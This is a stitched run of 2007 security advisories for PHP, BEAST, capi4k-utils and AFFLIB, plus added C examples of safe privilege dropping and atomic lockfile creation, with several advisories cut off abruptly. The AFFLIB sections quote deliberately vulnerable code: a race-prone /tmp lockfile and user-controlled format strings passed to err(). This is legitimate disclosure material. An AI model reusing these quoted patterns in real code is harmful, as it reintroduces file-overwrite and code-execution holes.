The FILTER_VALIDATE_EMAIL filter extension used a wrong regular expression
that allowed injecting a newline character at the end of the email string.
This could be exploited to inject arbitrary email headers. This issue only
affects Ubuntu 7.04. (CVE-2007-1900)

Updated packages for Ubuntu 6.06 LTS:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5_5.1.2-1ubuntu3.7.diff.gz
      Size/MD5:   117479 97145052f56b881e5bdcd933194a391d
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5_5.1.2-1ubuntu3.7.dsc
      Size/MD5:     1766 427fffd561dd912abb032c73db855677
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5_5.1.2.orig.tar.gz
      Size/MD5:  8064193 b5b6564e8c6a0d5bc1d2b4787480d792

  Architecture independent packages:
[ GLSA 200704-22 ] BEAST: Denial of Service
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                   Gentoo Linux Security Advisory           GLSA 200704-22
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Low
     Title: BEAST: Denial of Service
      Date: April 27, 2007
      Bugs: #163146
        ID: 200704-22

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

A vulnerability has been discovered in BEAST allowing for a Denial of
Service.

Background
==========

BEdevilled Audio SysTem is an audio compositor, supporting a wide range
of audio formats.

Affected packages
=================

    -------------------------------------------------------------------
     Package                /  Vulnerable  /             Unaffected
    -------------------------------------------------------------------
  1  media-sound/beast           < 0.7.1                   >= 0.7.1

Description
===========

BEAST, which is installed as setuid root, fails to properly check
whether it can drop privileges accordingly if seteuid() fails due to a
user exceeding assigned resource limits.

Impact
======

A local user could exceed his resource limit in order to prevent the
seteuid() call from succeeding. This may lead BEAST to keep running with
root privileges. Then, the local user could use the "save as" dialog box
to overwrite any file on the vulnerable system, potentially leading to a
Denial of Service.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All BEAST users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=media-sound/beast-0.7.1"

References
==========

  [ 1 ] CVE-2006-2916
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2916
  [ 2 ] CVE-2006-4447
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4447

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200704-22.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2007 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
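The privilege-drop check the advisory describes BEAST as missing, as an added example that is not BEAST's code: every step of the drop is checked and then verified by re-reading the credentials, so a setuid-root program that hits the failure described above aborts instead of carrying on as root. It assumes a POSIX system; setgid()/setuid() stand in for BEAST's seteuid() sequence, and drop_privileges() is a name chosen here.

```c
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

/* Returns 0 only when the process verifiably runs as uid/gid and, for a
 * non-root target, can no longer regain root; -1 otherwise, so the caller
 * must abort rather than keep going with the privileges it started with. */
int drop_privileges(uid_t uid, gid_t gid)
{
    /* Group first: once the uid is dropped, setgid() would be refused.
     * (Supplementary groups would be cleared with setgroups(), which is
     * not POSIX and is left out of this example.) */
    if (setgid(gid) != 0) {
        fprintf(stderr, "setgid(%ld): %s\n", (long)gid, strerror(errno));
        return -1;
    }
    /* This is the call the advisory says BEAST did not check: even a
     * root process can be refused, e.g. when the target user is already
     * at its resource limit. Ignoring the failure means running on as root. */
    if (setuid(uid) != 0) {
        fprintf(stderr, "setuid(%ld): %s\n", (long)uid, strerror(errno));
        return -1;
    }
    /* Do not trust the return codes alone: re-read all four ids. */
    if (getuid() != uid || geteuid() != uid ||
        getgid() != gid || getegid() != gid)
        return -1;
    /* A non-root target must not be able to become root again. */
    if (uid != 0 && setuid(0) == 0)
        return -1;
    return 0;
}
```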
[ GLSA 200704-23 ] capi4k-utils: Buffer overflow
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                   Gentoo Linux Security Advisory           GLSA 200704-23
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
     Title: capi4k-utils: Buffer overflow
      Date: April 27, 2007
      Bugs: #170870
        ID: 200704-23

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

capi4k-utils is vulnerable to a buffer overflow in the bufprint()
function.

Background
==========

capi4k-utils is a set of utilities for accessing COMMON-ISDN-API
software interfaces for ISDN devices.

Affected packages
=================

    -------------------------------------------------------------------
     Package                  /  Vulnerable  /           Unaffected
    -------------------------------------------------------------------
  1  net-dialup/capi4k-utils    < 20050718-r3          >= 20050718-r3

Description
===========

The bufprint() function in capi4k-utils fails to properly check
boundaries of data coming from CAPI packets.

Impact
======

A local attacker could possibly escalate privileges or cause a Denial of
Service by sending a crafted CAPI packet.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All capi4k-utils users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=net-dialup/capi4k-utils-20050718-r3"

References
==========

  [ 1 ] CVE-2007-1217
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=2007-1217

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200704-23.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2007 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
AFFLIB(TM): Time-of-Check-Time-of-Use File Race
Virtual Security Research, LLC.
http://www.vsecurity.com/
Security Advisory

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Advisory Name: Time-of-Check-Time-of-Use File Race in AFFLIB
 Release Date: 2007-04-27
  Application: AFFLIB(TM)
     Versions: 2.2.0-2.2.8 and likely earlier versions.
     Severity: Low
       Author: Timothy D. Morgan tmorgan {at} vsecurity {dot} com
Vendor Status: Vendor Notified
CVE Candidate: CVE-2007-2056
    Reference: http://www.vsecurity.com/bulletins/advisories/2007/afflib-toctou.txt
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Product Description:

From the forensicswiki.org website[1]:

  The Advanced Forensics Format (AFF) is an extensible open format for
  the storage of disk images and related forensic metadata. It was
  developed by Simson Garfinkel and Basis Technology.

AFFLIB(TM) is the reference implementation of the AFF(TM) format,
written primarily by Simson Garfinkel. It comes in the form of an open
source library and a set of command line tools used to manipulate
AFF(TM) files.

Vulnerability Overview:

In mid-March, 2007 Virtual Security Research, LLC (VSR) performed a
security code review of AFFLIB(TM) as a part of an internal tool
assessment process. As a result, multiple vulnerabilities of varying
severities were discovered. The most significant of these
vulnerabilities are being announced publicly to raise awareness and
help end-users secure themselves against potential attack.

A time-of-check-time-of-use race was discovered in AFFLIB(TM) which
could allow an attacker on the local machine to overwrite an arbitrary
file. Because the content of the file would not be controllable by an
attacker, it is unlikely that this vulnerability is exploitable for more
than a denial-of-service. This vulnerability remains in the latest
version (2.2.8) despite several notifications to the vendor.

All line numbers listed below are from version 2.2.0.

Vulnerability Details:

              File: aimage/aimage.cpp
             Lines: 554-575
Platforms Affected: Unix

Description:

The lockfile is created under /tmp with a mostly predictable name. An
access check is first performed, and later the file is opened,
truncating it if it already exists. Since the time of check and time of
use are not the same, a filesystem race could be exploited by a local
attacker through the use of a symlink.

Lines 548-582 are included below to illustrate the problem:

    int getlock(class imager *im)
    {
        /* If the file exists and the PID in the file is running,
         * can't get the lock.
         */
        char lockfile[MAXPATHLEN];
        sprintf(lockfile,"/tmp/aimge.%s.lock",im->infile);
        if(access(lockfile,F_OK)==0){
            /* Lockfile exists. Get its pid */
            char buf[1024];
            FILE *f = fopen(lockfile,"r");
            if(!f){
                perror(lockfile);       // can't read lockfile...
                return -1;
            }
            fgets(buf,sizeof(buf),f);
            buf[sizeof(buf)-1] = 0;
            int pid = atoi(buf);
            if(checkpid(pid)==0){
                /* PID is not running; we can delete the lockfile */
                if(unlink(lockfile)){
                    err(1,"could not delete lockfile %s: ",lockfile);
                }
            }
            /* PID is running; generate error */
            errx(1,"%s is locked by process %d\n",im->infile,pid);
        }
        FILE *f = fopen(lockfile,"w");
        if(!f){
            err(1,lockfile);
        }
        fprintf(f,"%d\n",getpid());     // save our PID.
        fclose(f);
        return 0;
    }

This is likely only exploitable for a denial-of-service condition, since
the attacker would have little control over the content being written
(the process ID of aimage).

Vendor Response:

Simson Garfinkel was first contacted on 2007-03-31. The following
timeline outlines the responses from the vendor regarding this issue:

  2007-04-01 - Vendor provided details of all vulnerabilities identified.
  2007-04-03 - Continued vendor communication.
  2007-04-05 - Vendor released version 2.2.6, containing multiple
               security fixes.
  2007-04-06 - Vendor notified VSR that fixes were released.
  2007-04-09 - VSR notified vendor that 9 vulnerability instances still
               remained in latest release.
  2007-04-12 - Vendor confirmed that remaining vulnerabilities would be
               fixed in next release.
  2007-04-25 - Vendor released versions 2.2.7 and 2.2.8. Vendor did not
               notify VSR.
  2007-04-27 - VSR discovered new versions were released. VSR inspected
               version 2.2.8 and found that no additional vulnerabilities
               were fixed. VSR advisories published.

Recommendation:

AFFLIB(TM) users should upgrade to the newest version. Third-party
AFFLIB(TM): Multiple Format String Injections
Virtual Security Research, LLC.
http://www.vsecurity.com/
Security Advisory

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Advisory Name: Multiple Format String Injections in AFFLIB
 Release Date: 2007-04-27
  Application: AFFLIB(TM)
     Versions: 2.2.0-2.2.5 and likely earlier. 2.2.6-2.2.8 contain a
               subset of these vulnerabilities.
     Severity: Medium to Low
       Author: Timothy D. Morgan tmorgan {at} vsecurity {dot} com
Vendor Status: Vendor Notified, Limited Fixes Available
CVE Candidate: CVE-2007-2054
    Reference: http://www.vsecurity.com/bulletins/advisories/2007/afflib-fmtstr.txt
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Product Description:

From the forensicswiki.org website[1]:

  The Advanced Forensics Format (AFF) is an extensible open format for
  the storage of disk images and related forensic metadata. It was
  developed by Simson Garfinkel and Basis Technology.

AFFLIB(TM) is the reference implementation of the AFF(TM) format,
written primarily by Simson Garfinkel. It comes in the form of an open
source library and a set of command line tools used to manipulate
AFF(TM) files.

Vulnerability Overview:

In mid-March, 2007 Virtual Security Research, LLC (VSR) performed a
security code review of AFFLIB(TM) as a part of an internal tool
assessment process. As a result, multiple vulnerabilities of varying
severities were discovered. The most significant of these
vulnerabilities are being announced publicly to raise awareness and
help end-users secure themselves against potential attack.

Several command line utilities included in AFFLIB(TM) pass command line
arguments to warn() and err() calls as the format string argument. If
an attacker could influence these command line parameters, these could
be exploited to execute arbitrary code. Some of the listed
vulnerabilities have been fixed in versions 2.2.6 and later, but others
remain in the latest release (2.2.8).

All line numbers listed below are from version 2.2.0.

Vulnerability Details:

The following sections include detailed descriptions of the format
string injection vulnerabilities found during the assessment.

* Format String Injection in s3 *

     File: lib/s3.cpp
     Line: 207

Description:

A command line parameter is used as the format string in the err()
call. If an attacker could control this name, a format string injection
vulnerability could be exploited.

Lines 192-207 are included to illustrate the problem:

    void s3_cp(const char *fname,string key)
    {
        struct s3headers meta[2] = {{0,0},{0,0}};
        char buf[64];

        if(opt_flag){
            snprintf(buf,sizeof(buf),"%d",opt_flag);
            meta[0].name = AMAZON_METADATA_PREFIX "arg";
            meta[0].value = buf;
        }

        /* Read from fname into a buffer.
         * Note that we do this with read, so that we can read from stdin
         */
        FILE *f = fopen(fname,"r");
        if(!f) err(1,fname);

An attacker could exploit this problem if the s3 binary were
setuid/setgid, or if the s3 program were executed in a CGI script or
something similar.

* Format String Injections in afconvert *

     File: tools/afconvert.cpp
    Lines: 226, 263, and 305

Description:

A command line parameter is used as the format string in three err()
calls. If an attacker could control this name, a format string
injection vulnerability could be exploited.

* Format String Injection in afcopy *

     File: tools/afcopy.cpp
    Lines: 202 and 250

Description:

A command line parameter is used as the format string in two err()
calls. If an attacker could control this name, a format string
injection vulnerability could be exploited.

* Format String Injection in afinfo *

     File: tools/afinfo.cpp
     Line: 584

Description:

A command line parameter is used as the format string in the err()
call. If an attacker could control this name, a format string injection
vulnerability could be exploited.

* Format String Injection in aimage *

     File: aimage/aimage.cpp
     Line: 577

Description:

A command line parameter is used as the format string in the err()
call. If an attacker could control this name, a format string injection
vulnerability could be exploited.

Lines 548-577 are included below to help illustrate the problem:

    int getlock(class imager *im)
    {
        /* If the file exists and the PID in the file is running,
         * can't get the lock.
         */
        char lockfile[MAXPATHLEN];
        sprintf(lockfile,"/tmp/aimge.%s.lock",im->infile);
        if(access(lockfile,F_OK)==0){
            /* Lockfile exists. Get its pid */
            char buf[1024];
            FILE *f = fopen(lockfile,"r");
            if(!f){
                perror(lockfile);       // can't read lockfile...
                return -1;
            }
            fgets(buf,sizeof(buf),f);
            buf[sizeof(buf)-1] = 0;
            int pid = atoi(buf);
            if(checkpid(pid)==0){
                /* PID is not running; we can delete the lockfile */
                if(unlink(lockfile)){
                    err(1,"could not delete lockfile %s: ",lockfile);
                }
            }
            /* PID is running; generate error */
            errx(1,"%s is locked by process %d\n",im->infile,pid);
        }
        FILE *f = fopen(lockfile,"w");
        if(!f){
            err(1,lockfile);
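As an added example (not AFFLIB's code) covering both this advisory and the file race advisory above: a replacement for the getlock() pattern that creates the lock file atomically with O_CREAT|O_EXCL|O_NOFOLLOW instead of access() followed by fopen("w"), and that reports the file name through a "%s" argument rather than as the err() format string. It assumes a POSIX system; acquire_lock(), lock_demo() and the /tmp path they use are names and values chosen here.

```c
#define _POSIX_C_SOURCE 200809L   /* O_NOFOLLOW, kill(), write() */
#include <errno.h>
#include <fcntl.h>
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* 0: lock created with our PID; 1: a live process holds it; -1: error. */
int acquire_lock(const char *lockfile)
{
    for (int attempt = 0; attempt < 2; attempt++) {
        /* Atomic create: no access()-then-fopen() window to race, and
         * O_NOFOLLOW refuses a symlink planted at this path. */
        int fd = open(lockfile, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0644);
        if (fd >= 0) {
            char buf[32];
            int n = snprintf(buf, sizeof buf, "%d\n", (int)getpid());
            int ok = write(fd, buf, (size_t)n) == n;
            close(fd);
            return ok ? 0 : -1;
        }
        if (errno != EEXIST) {
            /* The path is data: a %s argument, never the format string. */
            fprintf(stderr, "cannot create %s: %s\n", lockfile, strerror(errno));
            return -1;
        }
        char buf[32] = {0};
        fd = open(lockfile, O_RDONLY | O_NOFOLLOW);
        if (fd < 0) return -1;
        ssize_t got = read(fd, buf, sizeof buf - 1);
        close(fd);
        long pid = got > 0 ? strtol(buf, NULL, 10) : 0;
        /* kill(pid, 0) probes liveness; EPERM still means "alive". */
        if (pid > 0 && (kill((pid_t)pid, 0) == 0 || errno == EPERM))
            return 1;
        /* Stale lock: remove it and retry the atomic create once. */
        if (unlink(lockfile) != 0 && errno != ENOENT) return -1;
    }
    return -1;
}

/* Self-check on a constructed /tmp path: fresh lock, then our own live
 * PID blocks a second attempt, then a planted stale PID is cleaned up. */
int lock_demo(void)
{
    char path[64];
    snprintf(path, sizeof path, "/tmp/lockdemo.%d.lock", (int)getpid());
    unlink(path);
    if (acquire_lock(path) != 0 || acquire_lock(path) != 1) return 1;
    FILE *f = fopen(path, "w");
    if (!f || fputs("2147483647\n", f) == EOF || fclose(f) != 0) return 2;
    if (acquire_lock(path) != 0) return 3;
    return unlink(path) == 0 ? 0 : 4;
}
```

Removing a stale lock and re-creating it is still two steps, but the retry goes through the same O_EXCL create, so a file that appears in between is treated as another holder rather than silently truncated.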